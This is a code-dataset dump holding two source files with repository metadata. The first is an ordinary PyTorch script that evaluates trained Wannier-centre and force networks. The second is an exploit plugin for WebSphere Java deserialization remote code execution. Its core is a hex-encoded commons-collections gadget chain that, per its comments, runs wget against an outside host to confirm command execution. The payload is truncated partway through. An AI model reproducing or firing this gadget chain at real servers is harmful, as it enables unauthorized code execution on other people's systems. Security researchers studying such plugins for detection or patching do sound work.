hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0ea441b9a5ea9b7ce8dfd0f75dcb8d92d735cd19
| 11,367
|
py
|
Python
|
train_test/test_networks.py
|
X4Science/SCFNN
|
5a9c68719e961ac958ea63a0d75e9f1f331578d7
|
[
"MIT"
] | 8
|
2021-09-28T08:57:12.000Z
|
2022-03-21T01:34:51.000Z
|
train_test/test_networks.py
|
andy90/SCFNN
|
5a9c68719e961ac958ea63a0d75e9f1f331578d7
|
[
"MIT"
] | null | null | null |
train_test/test_networks.py
|
andy90/SCFNN
|
5a9c68719e961ac958ea63a0d75e9f1f331578d7
|
[
"MIT"
] | 1
|
2022-03-27T09:43:00.000Z
|
2022-03-27T09:43:00.000Z
|
import numpy as np
from parameters import *
import torch
from torch import nn
import torch.optim as optim
from sklearn.decomposition import PCA
from useful_functions import *
def test_wannier_peturb(wannierxyz, features):
    """Evaluate the saved linear Wannier-perturbation network on `features`.

    The network weights are restored from "wannier_peturb.pth" in the working
    directory; `wannierxyz` supplies the reference values (its shape drives the
    reshape below, though the resulting target tensor is not used here).

    Returns the predictions mapped back to the original axis layout via
    `backward_axis` / `uncompress_dims` (from useful_functions).
    """
    inputs = torch.tensor(np.transpose(features, axes=(2, 3, 1, 0)), dtype=torch.float)

    # Reference values reshaped to (config, field, atom, wannier*xyz); kept for
    # parity with the training script even though nothing below reads them.
    n_config, n_field = wannierxyz.shape[3], wannierxyz.shape[4]
    flat_reference = np.transpose(wannierxyz, axes=(3, 4, 0, 1, 2)).reshape(
        n_config, n_field, wannierxyz.shape[0],
        wannierxyz.shape[1] * wannierxyz.shape[2])
    reference = torch.tensor(flat_reference, dtype=torch.float)

    class WCNet(nn.Module):
        """Single bias-free linear map from descriptors to 12 outputs."""

        def __init__(self):
            super(WCNet, self).__init__()
            in_features = features.shape[0]
            out_features = 12
            # bias=False: a zero descriptor must map to a zero perturbation
            self.linear_stack = nn.Sequential(
                nn.Linear(in_features, out_features, bias=False),
            )

        def forward(self, x):
            return self.linear_stack(x)

    model = WCNet()
    model.load_state_dict(torch.load("wannier_peturb.pth"))
    prediction = model(inputs)
    return backward_axis(uncompress_dims(prediction.detach().numpy(), 3, 4))
def test_wannier_GT(wannierxyz_GT, features):
    """Evaluate the saved ground-truth Wannier network and print its errors.

    Restores the network from "wannier_GT.pth" and the per-coordinate offsets
    from "wannier_GT_target_scale.txt", prints mean and per-component median
    absolute errors against the centred targets, then returns the de-scaled
    predictions in the original axis layout.
    """
    inputs = torch.tensor(np.transpose(features, axes=(2, 1, 0)), dtype=torch.float)
    raw_targets = torch.tensor(
        compress_dims(np.transpose(wannierxyz_GT, axes=(3, 0, 1, 2)), 2),
        dtype=torch.float)
    # Average for each xyz coordinate of the Wannier centres, used to centre
    # the targets (same scaling used at training time).
    offsets = torch.tensor(np.loadtxt("wannier_GT_target_scale.txt"), dtype=torch.float)
    targets = (raw_targets - offsets)

    class WCNet(nn.Module):
        """Three-layer tanh MLP: 36 -> 24 -> 16 -> 12."""

        def __init__(self):
            super(WCNet, self).__init__()
            d_in, d_hidden1, d_hidden2, d_out = 36, 24, 16, 12
            self.linear_tanh_stack = nn.Sequential(
                nn.Linear(d_in, d_hidden1),
                nn.Tanh(),
                nn.Linear(d_hidden1, d_hidden2),
                nn.Tanh(),
                nn.Linear(d_hidden2, d_out),
            )

        def forward(self, x):
            return self.linear_tanh_stack(x)

    model = WCNet()
    model.load_state_dict(torch.load("wannier_GT.pth"))
    predictions = model(inputs)
    # Mean absolute error per output component, then each component's median.
    print(torch.mean(torch.abs(targets - predictions), axis=(0, 1)))
    for component in range(12):
        print(torch.median(torch.abs(targets - predictions)[:, :, component]))
    descaled = predictions + offsets
    return np.transpose(uncompress_dims(descaled.detach().numpy(), 2, 4),
                        axes=(1, 2, 3, 0))
def test_force_peturb(fO, features, mol_type):
    """Evaluate the saved linear force-perturbation model for one species.

    `mol_type` selects the checkpoint file ("force_peturb_<mol_type>.pth").
    `fO` provides the reference forces (converted to a target tensor for
    parity with training, though not used below). Returns the predictions in
    the original axis layout via `backward_axis`.
    """
    inputs = torch.tensor(np.transpose(features, axes=(2, 3, 1, 0)), dtype=torch.float)
    # Reference forces with axes moved forward; kept but unused here.
    reference = torch.tensor(forward_axis(fO), dtype=torch.float)

    class WCNet(nn.Module):
        """Single bias-free linear map from descriptors to a force vector."""

        def __init__(self):
            super(WCNet, self).__init__()
            in_features = features.shape[0]
            # bias=False: zero descriptors must give a zero force response
            self.linear_stack = nn.Sequential(
                nn.Linear(in_features, 3, bias=False),
            )

        def forward(self, x):
            return self.linear_stack(x)

    model = WCNet()
    model.load_state_dict(torch.load("force_peturb_" + mol_type + ".pth"))
    return backward_axis(model(inputs).detach().numpy())
def test_force_GT(fO, fH):
    """Evaluate the trained BPNet ground-truth force model on the test set.

    Loads precomputed per-atom descriptors and descriptor derivatives
    (test_x*.npy) from the working directory, restores the network from
    "trained_force_model_statedict.pth", and evaluates it one configuration
    at a time.

    fO, fH: reference forces on O and H atoms; the transpose below assumes
    the configuration index is the last axis — TODO confirm against caller.
    Returns (yO_pred_stack, yH_pred_stack): predicted scaled forces with the
    configuration axis last.
    """
    # Per-atom descriptors (xO, xH) and descriptor derivatives (x*_d),
    # precomputed offline by the feature-generation step.
    xO = np.load("test_xO.npy")
    xH = np.load("test_xH.npy")
    xOO_d = np.load("test_xOO_d.npy")
    xOH_d = np.load("test_xOH_d.npy")
    xHO_d = np.load("test_xHO_d.npy")
    xHH_d = np.load("test_xHH_d.npy")
    xO = torch.tensor(xO, dtype=torch.float)
    xH = torch.tensor(xH, dtype=torch.float)
    xOO_d = torch.tensor(xOO_d, dtype=torch.float)
    xOH_d = torch.tensor(xOH_d, dtype=torch.float)
    xHO_d = torch.tensor(xHO_d, dtype=torch.float)
    xHH_d = torch.tensor(xHH_d, dtype=torch.float)
    fO = np.transpose(fO, axes=(2, 0, 1))  # move the config axis to the front
    fH = np.transpose(fH, axes=(2, 0, 1))
    # NOTE(review): yO/yH (scaled reference forces) are built but never used
    # below — presumably copied from the training script; kept as-is.
    yO = torch.tensor(fO, dtype=torch.float) / 0.05  # make the standard deviation of the forces to be about 1
    yH = torch.tensor(fH, dtype=torch.float) / 0.05
    class BPNet(nn.Module):
        """Behler–Parrinello-style net: one 3-layer subnetwork per species,
        with analytic propagation of descriptor derivatives through tanh."""
        def __init__(self):
            super(BPNet, self).__init__()
            # Oxygen subnetwork weights/biases: 30 -> 25 -> 25 -> 1.
            # Parameters are scaled by 1/5 at init, but load_state_dict below
            # overwrites them with the trained values anyway.
            n_first_O = 30
            n_second_O = 25
            n_third_O = 25
            self.w1_O = nn.Parameter(torch.randn((n_first_O, n_second_O))/5)
            self.b1_O = nn.Parameter(torch.randn(n_second_O)/5)
            self.w2_O = nn.Parameter(torch.randn((n_second_O, n_third_O))/5)
            self.b2_O = nn.Parameter(torch.randn(n_third_O)/5)
            self.w3_O = nn.Parameter(torch.randn((n_third_O, 1))/5)
            self.b3_O = nn.Parameter(torch.randn(1)/5)
            # Hydrogen subnetwork weights/biases: 27 -> 25 -> 25 -> 1.
            n_first_H = 27
            n_second_H = 25
            n_third_H = 25
            self.w1_H = nn.Parameter(torch.randn((n_first_H, n_second_H)) / 5)
            self.b1_H = nn.Parameter(torch.randn(n_second_H) / 5)
            self.w2_H = nn.Parameter(torch.randn((n_second_H, n_third_H)) / 5)
            self.b2_H = nn.Parameter(torch.randn(n_third_H) / 5)
            self.w3_H = nn.Parameter(torch.randn((n_third_H, 1)) / 5)
            self.b3_H = nn.Parameter(torch.randn(1) / 5)
        def forward(self, x_O, x_H, dx_OO, dx_HO, dx_OH, dx_HH):
            # Pre-activations of layers 1 and 2 for each species.
            z1_O = torch.matmul(x_O, self.w1_O) + self.b1_O
            z2_O = torch.matmul(torch.tanh(z1_O), self.w2_O) + self.b2_O
            z1_H = torch.matmul(x_H, self.w1_H) + self.b1_H
            z2_H = torch.matmul(torch.tanh(z1_H), self.w2_H) + self.b2_H
            # Chain rule through the subnetworks: each /cosh(z)**2 factor is
            # d tanh(z)/dz, so ap2_* is d(output)/d(input) applied to dx_*.
            ap1_OO = torch.matmul(dx_OO, self.w1_O) / torch.cosh(z1_O) ** 2
            ap2_OO = torch.matmul(ap1_OO, self.w2_O) / torch.cosh(z2_O) ** 2
            y_OO = torch.matmul(ap2_OO, self.w3_O)
            ap1_HO = torch.matmul(dx_HO, self.w1_O) / torch.cosh(z1_O) ** 2
            ap2_HO = torch.matmul(ap1_HO, self.w2_O) / torch.cosh(z2_O) ** 2
            y_HO = torch.matmul(ap2_HO, self.w3_O)
            ap1_HH = torch.matmul(dx_HH, self.w1_H) / torch.cosh(z1_H) ** 2
            ap2_HH = torch.matmul(ap1_HH, self.w2_H) / torch.cosh(z2_H) ** 2
            y_HH = torch.matmul(ap2_HH, self.w3_H)
            ap1_OH = torch.matmul(dx_OH, self.w1_H) / torch.cosh(z1_H) ** 2
            ap2_OH = torch.matmul(ap1_OH, self.w2_H) / torch.cosh(z2_H) ** 2
            y_OH = torch.matmul(ap2_OH, self.w3_H)
            # Sum the O- and H-subnetwork contributions for each species.
            y_O = torch.sum(y_OO, axis=(-1, -2)) + torch.sum(y_OH, axis=(-1, -2))
            y_H = torch.sum(y_HO, axis=(-1, -2)) + torch.sum(y_HH, axis=(-1, -2))  # this is like the change of total energy resulted by the change of H
            return y_O, y_H
    net = BPNet()
    net.load_state_dict(torch.load("trained_force_model_statedict.pth"))
    # Evaluate configuration by configuration, accumulating into tuples.
    yO_pred_all = ()
    yH_pred_all = ()
    for i in range(xO.shape[0]):
        yO_pred, yH_pred = net(xO[i], xH[i], xOO_d[i], xHO_d[i], xOH_d[i], xHH_d[i])
        yO_pred_all += (yO_pred, )
        yH_pred_all += (yH_pred, )
    # Stack predictions so the configuration axis is last, matching fO/fH.
    yO_pred_stack = torch.stack(yO_pred_all, -1).detach().numpy()
    yH_pred_stack = torch.stack(yH_pred_all, -1).detach().numpy()
    return yO_pred_stack, yH_pred_stack
def test_force_BP(fO, fH):
    """Evaluate the trained Behler–Parrinello force model on the test set.

    Identical pipeline to test_force_GT but restores the network from
    "trained_force_model_statedict_BP.pth". Loads descriptors and derivative
    arrays (test_x*.npy) from the working directory and evaluates the network
    per configuration.

    fO, fH: reference forces on O and H atoms; the transpose below assumes
    the configuration index is the last axis — TODO confirm against caller.
    Returns (yO_pred_stack, yH_pred_stack): predicted scaled forces with the
    configuration axis last.
    """
    # Per-atom descriptors (xO, xH) and descriptor derivatives (x*_d),
    # precomputed offline by the feature-generation step.
    xO = np.load("test_xO.npy")
    xH = np.load("test_xH.npy")
    xOO_d = np.load("test_xOO_d.npy")
    xOH_d = np.load("test_xOH_d.npy")
    xHO_d = np.load("test_xHO_d.npy")
    xHH_d = np.load("test_xHH_d.npy")
    xO = torch.tensor(xO, dtype=torch.float)
    xH = torch.tensor(xH, dtype=torch.float)
    xOO_d = torch.tensor(xOO_d, dtype=torch.float)
    xOH_d = torch.tensor(xOH_d, dtype=torch.float)
    xHO_d = torch.tensor(xHO_d, dtype=torch.float)
    xHH_d = torch.tensor(xHH_d, dtype=torch.float)
    fO = np.transpose(fO, axes=(2, 0, 1))  # move the config axis to the front
    fH = np.transpose(fH, axes=(2, 0, 1))
    # NOTE(review): yO/yH (scaled reference forces) are built but never used
    # below — presumably copied from the training script; kept as-is.
    yO = torch.tensor(fO, dtype=torch.float) / 0.05  # make the standard deviation of the forces to be about 1
    yH = torch.tensor(fH, dtype=torch.float) / 0.05
    class BPNet(nn.Module):
        """Behler–Parrinello-style net: one 3-layer subnetwork per species,
        with analytic propagation of descriptor derivatives through tanh."""
        def __init__(self):
            super(BPNet, self).__init__()
            # Oxygen subnetwork weights/biases: 30 -> 25 -> 25 -> 1.
            # Init values are overwritten by load_state_dict below.
            n_first_O = 30
            n_second_O = 25
            n_third_O = 25
            self.w1_O = nn.Parameter(torch.randn((n_first_O, n_second_O))/5)
            self.b1_O = nn.Parameter(torch.randn(n_second_O)/5)
            self.w2_O = nn.Parameter(torch.randn((n_second_O, n_third_O))/5)
            self.b2_O = nn.Parameter(torch.randn(n_third_O)/5)
            self.w3_O = nn.Parameter(torch.randn((n_third_O, 1))/5)
            self.b3_O = nn.Parameter(torch.randn(1)/5)
            # Hydrogen subnetwork weights/biases: 27 -> 25 -> 25 -> 1.
            n_first_H = 27
            n_second_H = 25
            n_third_H = 25
            self.w1_H = nn.Parameter(torch.randn((n_first_H, n_second_H)) / 5)
            self.b1_H = nn.Parameter(torch.randn(n_second_H) / 5)
            self.w2_H = nn.Parameter(torch.randn((n_second_H, n_third_H)) / 5)
            self.b2_H = nn.Parameter(torch.randn(n_third_H) / 5)
            self.w3_H = nn.Parameter(torch.randn((n_third_H, 1)) / 5)
            self.b3_H = nn.Parameter(torch.randn(1) / 5)
        def forward(self, x_O, x_H, dx_OO, dx_HO, dx_OH, dx_HH):
            # Pre-activations of layers 1 and 2 for each species.
            z1_O = torch.matmul(x_O, self.w1_O) + self.b1_O
            z2_O = torch.matmul(torch.tanh(z1_O), self.w2_O) + self.b2_O
            z1_H = torch.matmul(x_H, self.w1_H) + self.b1_H
            z2_H = torch.matmul(torch.tanh(z1_H), self.w2_H) + self.b2_H
            # Chain rule through the subnetworks: each /cosh(z)**2 factor is
            # d tanh(z)/dz, so ap2_* is d(output)/d(input) applied to dx_*.
            ap1_OO = torch.matmul(dx_OO, self.w1_O) / torch.cosh(z1_O) ** 2
            ap2_OO = torch.matmul(ap1_OO, self.w2_O) / torch.cosh(z2_O) ** 2
            y_OO = torch.matmul(ap2_OO, self.w3_O)
            ap1_HO = torch.matmul(dx_HO, self.w1_O) / torch.cosh(z1_O) ** 2
            ap2_HO = torch.matmul(ap1_HO, self.w2_O) / torch.cosh(z2_O) ** 2
            y_HO = torch.matmul(ap2_HO, self.w3_O)
            ap1_HH = torch.matmul(dx_HH, self.w1_H) / torch.cosh(z1_H) ** 2
            ap2_HH = torch.matmul(ap1_HH, self.w2_H) / torch.cosh(z2_H) ** 2
            y_HH = torch.matmul(ap2_HH, self.w3_H)
            ap1_OH = torch.matmul(dx_OH, self.w1_H) / torch.cosh(z1_H) ** 2
            ap2_OH = torch.matmul(ap1_OH, self.w2_H) / torch.cosh(z2_H) ** 2
            y_OH = torch.matmul(ap2_OH, self.w3_H)
            # Sum the O- and H-subnetwork contributions for each species.
            y_O = torch.sum(y_OO, axis=(-1, -2)) + torch.sum(y_OH, axis=(-1, -2))
            y_H = torch.sum(y_HO, axis=(-1, -2)) + torch.sum(y_HH, axis=(-1, -2))  # this is like the change of total energy resulted by the change of H
            return y_O, y_H
    net = BPNet()
    net.load_state_dict(torch.load("trained_force_model_statedict_BP.pth"))
    # Evaluate configuration by configuration, accumulating into tuples.
    yO_pred_all = ()
    yH_pred_all = ()
    for i in range(xO.shape[0]):
        yO_pred, yH_pred = net(xO[i], xH[i], xOO_d[i], xHO_d[i], xOH_d[i], xHH_d[i])
        yO_pred_all += (yO_pred, )
        yH_pred_all += (yH_pred, )
    # Stack predictions so the configuration axis is last, matching fO/fH.
    yO_pred_stack = torch.stack(yO_pred_all, -1).detach().numpy()
    yH_pred_stack = torch.stack(yH_pred_all, -1).detach().numpy()
    # NOTE(review): the traced module is never saved or returned — presumably
    # the author intended to serialize it (e.g. net_traced.save(...)); confirm.
    net_traced = torch.jit.trace(net, (xO[0], xH[0], xOO_d[0], xHO_d[0], xOH_d[0], xHH_d[0]))
    return yO_pred_stack, yH_pred_stack
| 39.46875
| 152
| 0.597255
| 1,892
| 11,367
| 3.319767
| 0.088795
| 0.056042
| 0.061137
| 0.080242
| 0.842223
| 0.827894
| 0.800987
| 0.787932
| 0.787932
| 0.773603
| 0
| 0.037321
| 0.264538
| 11,367
| 287
| 153
| 39.606272
| 0.713995
| 0.049177
| 0
| 0.775229
| 0
| 0
| 0.027883
| 0.008893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068807
| false
| 0
| 0.03211
| 0
| 0.169725
| 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eb83eb66204066ae4fe70459c8fc3d70e694187
| 7,920
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-1664.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-1664.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-1664.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = java unserialize websphere rce
#___From___ = http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
import random
import base64
def assign(service, arg):
    """Claim targets for this plugin.

    The scan framework calls this to ask whether the plugin applies.
    Returns (True, arg) when `service` is 'websphere'; otherwise returns
    None (implicitly declining the target, as the framework expects).
    """
    if service != 'websphere':
        return None
    return True, arg
def audit(arg):
    """Probe `arg` (a WebSphere base URL) for the commons-collections Java
    deserialization RCE via the SOAP AdminService.

    Sends a serialized payload whose gadget chain executes `wget` against a
    key-value sandbox service, then fetches the key back to confirm remote
    code execution. NOTE(review): this is Python 2 code — `base64.b64encode`
    is called on a str, and `curl` / `security_hole` are injected by the
    framework (`from dummy import *` in the __main__ block); confirm the
    runtime before reuse.
    """
    # Random 16-char lowercase marker substituted into the payload so each
    # probe writes (and later reads back) a unique key.
    flag = ""
    for i in range(16):
        flag += chr(ord('a')+random.randint(0,25))
    target = arg
    # Serialized AnnotationInvocationHandler/LazyMap/ChainedTransformer gadget
    # chain (ysoserial CommonsCollections style); the embedded command is
    # "wget https://pysandbox.sinaapp.com/kv?act=set&k=javaunjboss<marker>...".
    p = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\